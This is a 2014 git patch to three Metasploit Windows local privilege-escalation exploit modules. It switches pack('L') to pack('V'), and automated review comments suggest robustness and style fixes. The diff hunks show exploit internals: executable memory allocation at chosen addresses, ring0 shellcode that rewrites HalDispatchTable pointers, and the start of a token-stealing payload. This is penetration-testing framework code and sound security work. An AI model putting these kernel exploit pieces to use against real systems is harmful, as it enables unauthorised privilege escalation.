From 0cc3bdfb351a1790584c63dde8fa2ea50016c286 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Fri, 15 Aug 2014 21:11:37 +0100
Subject: [PATCH] Moar bad packs

---
 modules/exploits/windows/local/mqac_write.rb | 4 ++--
 modules/exploits/windows/local/ms_ndproxy.rb | 6 +++---
 modules/exploits/windows/local/novell_client_nwfs.rb | 8 ++++----
 3 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index e8c3ae4b7f..68f01e41f2 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -123,8 +123,8 @@ class Metasploit3 < Msf::Exploit::Local
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
-        [0xffff].pack('L'),
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
+        [0xffff].pack('V'),
         'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
     end
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index f2206e79ed..69d3f6b993 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
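Review bot: The NTSTATUS that NtAllocateVirtualMemory returns is dropped and base_addr is not re-tested after the call, so a failed allocation only surfaces later when the write misbehaves; fill_memory in the ms_ndproxy hunk of this same commit re-checks `proc.memory.writable?` after allocating, and this block should follow it, e.g. `status = session.railgun.ntdll.NtAllocateVirtualMemory(...)` and, after the call, `vprint_error("NtAllocateVirtualMemory failed: #{status['return']}") unless this_proc.memory.writable?(base_addr)`. The same discarded return value is in fill_memory in both the ms_ndproxy and novell_client_nwfs hunks. Nothing in the code records why 'V' rather than 'L' is needed (a fixed 32-bit little-endian layout for the target, whereas 'L' follows the byte order of the host running the framework), so a later tidy-up could revert it; a comment such as `# 'V': 32-bit little-endian for the target, regardless of host byte order` on the first pack call would prevent that, and the same applies to every pack changed in this patch. The enclosing method starts and ends outside the hunk.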
@@ -90,15 +90,15 @@ class Metasploit3 < Msf::Exploit::Local
   def ring0_shellcode(t)
     restore_ptrs = "\x31\xc0" # xor eax, eax
-    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('L') # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('L') # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
     ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     ring0_shellcode
   end
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('L'), nil, [length].pack('L'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('V'), nil, [length].pack('V'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
     unless proc.memory.writable?(address)
       vprint_error('Failed to allocate memory')
       return nil
diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb
index 90567648de..68c29882c8 100644
--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
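Review bot: In ring0_shellcode the local `ring0_shellcode` shadows the method's own name and exists only to be returned on the next line; dropping both lines and ending the method with `restore_ptrs + token_stealing_shellcode(t)` as its last expression says the same thing without the shadowing. The two restore_ptrs lines are the same instructions as in novell_client_nwfs's ring0_shellcode further down in this patch, differing only in quoting and bracket spacing, so the two modules will keep drifting apart unless the preamble is written identically or shared. Both methods continue past the end of the hunk, and fill_memory's body is cut off after `return nil`.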
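Review bot: The slice `results['lpImageBase'][0..results['lpcbNeeded'] - 1]` misbehaves when lpcbNeeded is 0: a Ruby range ending at -1 selects the whole string, so an empty enumeration would unpack the entire buffer into bogus addresses that the loop then passes to GetDeviceDriverBaseNameA. A start/length slice avoids the negative-end case and is shorter: `addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack('V*')`. The block also reassigns the outer `results` with the GetDeviceDriverBaseNameA result, which is harmless once `addresses` has been computed but easy to misread; a distinct name such as `name_result` would be clearer. find_sys_base continues past the end of the hunk.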
@@ -98,8 +98,8 @@ class Metasploit3 < Msf::Exploit::Local
   def ring0_shellcode(t)
     restore_ptrs = "\x31\xc0" # xor eax, eax
-    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
     tokenstealing = "\x52" # push edx # Save edx on the stack
     tokenstealing << "\x53" # push ebx # Save ebx on the stack
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Local
   def fill_memory(proc, address, length, content)
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
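Review bot: The two changed lines now mix quoting styles — `.pack('V')` is single-quoted while the keys `"HaliQuerySystemInfo"` and `"halDispatchTable"` and the opcode bytes stay double-quoted, and the padded `[ ... ]` brackets differ from the `[@addresses['...']]` form used for the identical lines in ms_ndproxy. Since the patch already touches these lines, bringing them to one form, `restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V')`, would keep the two modules readable side by side. ring0_shellcode continues past the end of the hunk (the tokenstealing sequence is only started here).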